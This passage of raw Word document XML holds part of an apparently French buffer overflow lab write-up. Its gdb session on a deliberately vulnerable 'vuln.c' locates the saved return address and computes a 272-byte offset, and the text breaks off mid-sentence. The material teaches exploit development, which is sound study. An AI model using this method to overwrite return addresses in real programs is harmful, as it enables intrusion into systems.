    <w:p w14:paraId="195FF35A" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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 xml:space="preserve">Breakpoint 1 at 0x565561c2: file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vuln.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, line 6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11077CDE" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00943CF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run AAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674E1AD3" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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>Starting program: /home/kali/Downloads/vuln AAAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A680A1D" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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 xml:space="preserve">[Thread debugging using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libthread_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabled]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4458BEDF" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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 xml:space="preserve">Using host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libthread_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> library "/lib/x86_64-linux-gnu/libthread_db.so.1".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9F3DAA" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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</w:p>
    <w:p w14:paraId="470D75A1" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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>Breakpoint 1, vuln (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=0xffffd3c2 "AAAA") at vuln.c:6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A667747" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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 xml:space="preserve">6           </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">buffer, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FADE2B" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00943CF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>info frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2A0FBB" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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>Stack level 0, frame at 0xffffd0f0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAA595D" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0x565561c2 in vuln (vuln.c:6); saved </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x5655623e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48333C4C" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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 xml:space="preserve"> called by frame at 0xffffd130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709CFE95" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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 xml:space="preserve"> source language c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DF8533" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Arglist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> at 0xffffd0e8, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=0xffffd3c2 "AAAA"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0705E519" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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 xml:space="preserve"> Locals at 0xffffd0e8, Previous frame's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is 0xffffd0f0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0832B552" w14:textId="77777777" w:rsidR="00840174" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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 xml:space="preserve"> Saved registers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7732E028" w14:textId="1C62B7F9" w:rsidR="00885E25" w:rsidRPr="00840174" w:rsidRDefault="00840174" w:rsidP="00840174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40174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> at 0xffffd0e4, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> at 0xffffd0e8, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840174">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> at 0xffffd0ec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08268EB5" w14:textId="77777777" w:rsidR="00885E25" w:rsidRDefault="00885E25" w:rsidP="00885E25">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="326E2C57" w14:textId="18DBEB84" w:rsidR="00840174" w:rsidRDefault="00057932" w:rsidP="00885E25">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00F63887">
        <w:t xml:space="preserve">ous </w:t>
      </w:r>
      <w:r>
        <w:t>pouvons maintenant afficher</w:t>
      </w:r>
      <w:r w:rsidR="00F63887">
        <w:t xml:space="preserve"> le contenu de la </w:t>
      </w:r>
      <w:r>
        <w:t>stack</w:t>
      </w:r>
      <w:r w:rsidR="00F63887">
        <w:t xml:space="preserve"> à partir du </w:t>
      </w:r>
      <w:r w:rsidR="0097224F">
        <w:t xml:space="preserve">buffer. Comme le buffer fait 256 bytes, nous savons que nous devons afficher </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">plus que </w:t>
      </w:r>
      <w:r w:rsidR="00F668F8">
        <w:t xml:space="preserve">256 bytes pour afficher </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">également </w:t>
      </w:r>
      <w:r w:rsidR="00D6371F">
        <w:t>la stack frame</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> qui se retrouve après le buffer sur la stack</w:t>
      </w:r>
      <w:r w:rsidR="00D6371F">
        <w:t xml:space="preserve"> et la return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D6371F">
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D6371F">
        <w:t xml:space="preserve"> qui s’y trouve. Nous utilisons</w:t>
      </w:r>
      <w:r w:rsidR="00D6371F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> x/68xw &amp;buffer</w:t>
      </w:r>
      <w:r w:rsidR="00D6371F">
        <w:t xml:space="preserve"> pour afficher 68 </w:t>
      </w:r>
      <w:r w:rsidR="007E6308">
        <w:t xml:space="preserve">groupes de 4 bytes (donc 272 bytes) affichés sous forme hexadécimale, à partir de l’adresse du buffer. Nous y retrouvons la return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007E6308">
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007E6308">
        <w:t xml:space="preserve"> et nous pouvons compter </w:t>
      </w:r>
      <w:r w:rsidR="008C7C64">
        <w:t xml:space="preserve">le nombre de bytes entre le début du buffer et </w:t>
      </w:r>
      <w:r>
        <w:t>elle</w:t>
      </w:r>
      <w:r w:rsidR="008C7C64">
        <w:t>, ce qui sera notre nombre de bytes à écrire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8D3229" w14:textId="77777777" w:rsidR="008C7C64" w:rsidRDefault="008C7C64" w:rsidP="00885E25">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20750938" w14:textId="2BA394B3" w:rsidR="003B4231" w:rsidRPr="00943CF9" w:rsidRDefault="003B4231" w:rsidP="003B423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943CF9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(gdb) </w:t>
      </w:r>
      <w:r w:rsidRPr="00943CF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">x/68xw </w:t>
      </w:r>
      <w:r w:rsidR="008E2400" w:rsidRPr="00943CF9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&amp;buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EF7BEA" w14:textId="0B23DF29" w:rsidR="003B4231" w:rsidRPr="00943CF9" w:rsidRDefault="003B4231" w:rsidP="003B423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943CF9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcfe0:     </w:t>
      </w:r>
      <w:r w:rsidR="00DC0B66" w:rsidRPr="00943CF9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xf7fc7424</w:t>
      </w:r>
      <w:r w:rsidR="00943CF9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00943CF9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xf7ffcf00      0xf7fc76c4      0xf7c18482</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3271A04B" w14:textId="77777777" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B423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D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcff0:     0xf7fc7694      0x003055e4      0xffffd020      0x000182af</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1F2062" w14:textId="77777777" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B423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D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0xffffd000:     0xffffd0b4      0xf7fbf780      0xf7c12338      0xf7fbf4a0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612A1FD9" w14:textId="77777777" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B423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D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffd010:     0xffffd064      0xffffd060      0x00000003      0x00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2814B647" w14:textId="77777777" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B423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D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffd020:     0x00000000      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000000</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      0xf7c12338      0x565552cb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA19198" w14:textId="77777777" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B423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D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffd030:     0xf7c09158      0xf7fbf66c      0xffffd0b4      0x003055e4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5B38DA" w14:textId="77777777" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B423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D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffd040:     0xf7c18482      0xf7fd0f14      0xf7c05638      0xffffd0bc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A0EBB9" w14:textId="77777777" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B423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D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffd050:     0xf7ffdba0      0x00000002      0xf7fbfb20      0x00000001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707FDAAA" w14:textId="77777777" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B423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D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffd060:     0x00000000      0x00000001      0xf7fbf4a0      0x56555034</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F4B061" w14:textId="77777777" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B423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D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffd070:     0x00000020      0xf7ffdc0c      0xffffd0f4      0x00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1F6690" w14:textId="77777777" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B423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D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffd080:     0xf7ffcff4      0x0000002c      0x00000000      0xffffd0fc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AE5664" w14:textId="77777777" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B423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D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffd090:     0xf7ffdba0      0x00000001      0xf7fbf7b0      0x00000001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2334F706" w14:textId="77777777" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B423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D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffd0a0:     0x00000000      0x00000001      0xf7ffda40      0x00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F5599A" w14:textId="77777777" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B423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D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffd0b0:     0x00000000      0xffffffff      0x00000000      0xf7fc7694</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7B3A2A" w14:textId="77777777" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B423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D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffd0c0:     0xf7ffd608      0x0000002c      0x00000000      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000000</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E735991" w14:textId="77777777" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B423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D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffd0d0:     0x00000000      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000000</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000000</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      0xffffdfde</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5443334A" w14:textId="4A3FD057" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B4231">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffd0e0:     0xf7fc5550      0xf7e20ff4      0xffffd118      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D27BF0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0x5655623e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1D839D" w14:textId="77777777" w:rsidR="003B4231" w:rsidRPr="00D27BF0" w:rsidRDefault="003B4231" w:rsidP="003B4231">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35AA4F88" w14:textId="1727319A" w:rsidR="007E6308" w:rsidRDefault="00FE1E53" w:rsidP="00885E25">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE1E53">
        <w:t>Nous trouvons</w:t>
      </w:r>
      <w:r w:rsidR="00100AFC">
        <w:t xml:space="preserve"> 17 lignes de 4 groupes de 4 bytes. </w:t>
      </w:r>
      <w:r w:rsidR="00AC1078">
        <w:t>Nous trouvons</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE1E53">
        <w:t xml:space="preserve"> donc qu’il fa</w:t>
      </w:r>
      <w:r>
        <w:t>ut écrire un total de</w:t>
      </w:r>
      <w:r w:rsidR="00AC1078">
        <w:t xml:space="preserve"> 17*4*4 =</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C17154">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>272</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bytes</w:t>
